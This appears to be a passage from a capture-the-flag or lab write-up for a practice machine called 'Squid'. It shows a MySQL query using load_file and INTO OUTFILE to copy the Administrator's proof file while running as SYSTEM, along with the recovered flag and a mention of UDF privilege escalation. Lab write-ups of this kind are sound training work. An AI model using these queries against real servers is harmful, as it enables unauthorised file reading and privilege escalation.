MySQL
The target MySQL instance is running with privileges of SYSTEM.
/Practice/Squid/4-Post_Enumeration/attachments/{0AD72D61-0EB4-46FC-829C-1A613618A009}.png)
This would mean that the SQL query execution earlier is made with the security context of SYSTEM
Read / Write
/Practice/Squid/4-Post_Enumeration/attachments/{FD95EF22-91FD-4421-A452-B26829898BEA}.png)
SELECT load_file('C:\\Users\\Administrator\\Desktop\\proof.txt') INTO OUTFILE 'C:\\tmp\\proof.txt' Copying a file that is only readable by the administrator user to the C:\tmp directory
PS C:\tmp> cat C:\tmp\proof.txt
457d6d40ae0146a717b6591f03c2d0ba
\This would mean that I could virtually read/write any file on the target system Additionally, privilege escalation is possible through the UDF exploit